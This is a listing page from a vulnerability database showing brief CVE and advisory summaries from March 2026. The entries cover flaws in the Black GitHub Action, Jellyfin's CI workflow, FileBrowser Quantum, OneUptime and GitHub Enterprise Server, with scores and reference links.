Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in
🔥 Daily Hot!
💪🏽 CPE Enhanced Advisories
🕶 Shadow Exploits
🕵🏼 Vulners CPE
🔐 Security news
💻 Exploit updates
📑 Blogs review
🐧 Linux vulnerabilities
🐞 Bugbounty
🤖 AI High Score
📰 CVE Feed
show all

29497 matches found

CVE
CVEadded 2026/03/11 7:15 p.m.14 views

CVE-2026-31900

CVE-2026-31900 concerns the Black Python code formatter used in a GitHub Action. The vulnerability arises when the action reads the Black version from a repository’s pyproject.toml (use_pyproject: true). A malicious pull request could alter pyproject.toml to reference a direct URL to a malicious ...

9.8CVSS6.3AI score0.00089EPSS
Exploits0References2Affected Software1
AlpineLinux
AlpineLinuxadded 2026/03/11 7:15 p.m.2 views

CVE-2026-31900

Black is the uncompromising Python code formatter. Black provides a GitHub action for formatting code. This action supports an option, usepyproject: true, for reading the version of Black to use from the repository pyproject.toml. A malicious pull request could edit pyproject.toml to use a direct...

9.8CVSS6.3AI score0.00089EPSS
Exploits0References2
OSV
OSVadded 2026/03/11 7:15 p.m.0 views

CVE-2026-31900 Black's vulnerable version parsing leads to RCE in GitHub Action

Black is the uncompromising Python code formatter. Black provides a GitHub action for formatting code. This action supports an option, usepyproject: true, for reading the version of Black to use from the repository pyproject.toml. A malicious pull request could edit pyproject.toml to use a direct...

8.7CVSS6.3AI score0.00089EPSS
Exploits0References4
Vulnrichment
Vulnrichmentadded 2026/03/11 7:15 p.m.1 views

CVE-2026-31900 Black's vulnerable version parsing leads to RCE in GitHub Action

Black is the uncompromising Python code formatter. Black provides a GitHub action for formatting code. This action supports an option, usepyproject: true, for reading the version of Black to use from the repository pyproject.toml. A malicious pull request could edit pyproject.toml to use a direct...

8.7CVSS6.3AI score0.00089EPSS
Exploits0References2
NVD
NVDadded 2026/03/11 5:16 p.m.3 views

CVE-2026-31852

Jellyfin is an open-source media system. The code-quality.yml GitHub Actions workflow in jellyfin/jellyfin-ios is vulnerable to arbitrary code execution via pull requests from forked repositories. Due to the workflow's elevated permissions nearly all write permissions, this vulnerability enables...

10CVSS0.00124EPSS
Exploits0References2
OSV
OSVadded 2026/03/11 4:0 p.m.0 views

GO-2026-4659 FileBrowser Quantum: Password-Protected Share Bypass via /public/api/share/info in github.com/gtsteffaniak/filebrowser/backend

FileBrowser Quantum: Password-Protected Share Bypass via /public/api/share/info in github.com/gtsteffaniak/filebrowser/backend...

7.5CVSS5.8AI score0.00107EPSS
Exploits1References3
Circl
Circladded 2026/03/11 2:50 p.m.4 views

CVE-2026-32104

creationtimestamp| type| source ---|---|--- 2026-03-11 14:50:34+00:00| published-proof-of-concept| https://github.com/withstudiocms/studiocms/security/advisories/GHSA-9v82-xrm4-mp52...

5.4CVSS5.8AI score0.00019EPSS
Exploits1References1
Circl
Circladded 2026/03/11 12:10 p.m.0 views

GHSA-H3RV-Q4RQ-PQCV

creationtimestamp| type| source ---|---|--- 2026-03-11 12:10:06+00:00| seen| https://gist.github.com/alon710/90d4653c1f3204acd98b3c7dd62773cd...

5.8AI score
Exploits0References1
RedhatCVE
RedhatCVEadded 2026/03/11 7:8 a.m.5 views

CVE-2026-30920

OneUptime is a solution for monitoring and managing online services. Prior to 10.0.19, OneUptime's GitHub App callback trusts attacker-controlled state and installationid values and updates Project.gitHubAppInstallationId with isRoot: true without validating that the caller is authorized for the...

8.6CVSS5.8AI score0.00011EPSS
Exploits1References1
Circl
Circladded 2026/03/11 6:40 a.m.1 views

GHSA-MHG6-2Q2V-9H2C

creationtimestamp| type| source ---|---|--- 2026-03-11 06:40:06+00:00| seen| https://gist.github.com/alon710/e6746ea37c744f27fa53aba7fbd358d4...

5.8AI score
Exploits0References1
Circl
Circladded 2026/03/11 1:11 a.m.3 views

CVE-2026-32110

creationtimestamp| type| source ---|---|--- 2026-03-11 01:11:29+00:00| published-proof-of-concept| https://github.com/siyuan-note/siyuan/security/advisories/GHSA-56cv-c5p2-j2wg...

8.3CVSS7.2AI score0.0006EPSS
Exploits1References1
Circl
Circladded 2026/03/11 12:37 a.m.4 views

CVE-2026-31975

creationtimestamp| type| source ---|---|--- 2026-03-11 00:37:25+00:00| published-proof-of-concept| https://github.com/advisories/GHSA-gv8f-wpm2-m5wr...

9.8CVSS5.8AI score0.00526EPSS
Exploits1References1
CNNVD
CNNVDadded 2026/03/11 12:0 a.m.3 views

Jellyfin 安全漏洞

Jellyfin is an open-source free software media system developed by Jellyfin. It allows you to control the management and streaming of media. It serves as a replacement for proprietary products like Emby and Plex, enabling the delivery of media from proprietary servers to end-user devices through...

10CVSS6.3AI score0.00124EPSS
Exploits0References2
CBLMariner
CBLMarineradded 2026/03/10 10:56 p.m.3 views

CVE-2026-24117 affecting package gh for versions less than 2.62.0-13

CVE-2026-24117 affecting package gh for versions less than 2.62.0-13. A patched version of the package is available...

5.3CVSS5.8AI score0.00016EPSS
Exploits0
EUVD
EUVDadded 2026/03/10 9:32 p.m.4 views

EUVD-2026-10792

An improper neutralization of input vulnerability was identified in GitHub Enterprise Server that allowed DOM-based cross-site scripting via task list content. The task list content extraction logic did not properly re-encode browser-decoded text nodes before rendering, allowing user-supplied HTM...

7.4CVSS5.9AI score0.00034EPSS
Exploits0References3
EUVD
EUVDadded 2026/03/10 9:32 p.m.2 views

EUVD-2026-10793

An improper neutralization of input vulnerability was identified in GitHub Enterprise Server that allowed DOM-based cross-site scripting via task list content. The task list content extraction logic did not properly re-encode browser-decoded text nodes before rendering, allowing user-supplied HTM...

7.4CVSS5.9AI score0.00034EPSS
Exploits0References3
EUVD
EUVDadded 2026/03/10 9:32 p.m.6 views

EUVD-2026-10828

An Incorrect Authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated user with a classic personal access token PAT lacking the repo scope to retrieve issues and commits from private and internal repositories via the search REST API endpoints. The user...

5.3CVSS5.8AI score0.00026EPSS
Exploits0References5
EUVD
EUVDadded 2026/03/10 9:32 p.m.5 views

EUVD-2026-10829

An Incorrect Authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated user with a classic personal access token PAT lacking the repo scope to retrieve issues and commits from private and internal repositories via the search REST API endpoints. The user...

5.3CVSS5.8AI score0.00026EPSS
Exploits0References5
OSV
OSVadded 2026/03/10 8:16 p.m.1 views

CVE-2026-3582

An Incorrect Authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated user with a classic personal access token PAT lacking the repo scope to retrieve issues and commits from private and internal repositories via the search REST API endpoints. The user...

4.3CVSS5.8AI score0.00026EPSS
Exploits0References4
NVD
NVDadded 2026/03/10 8:16 p.m.2 views

CVE-2026-3582

An Incorrect Authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated user with a classic personal access token PAT lacking the repo scope to retrieve issues and commits from private and internal repositories via the search REST API endpoints. The user...

5.3CVSS0.00026EPSS
Exploits0References4
Rows per page
Query Builder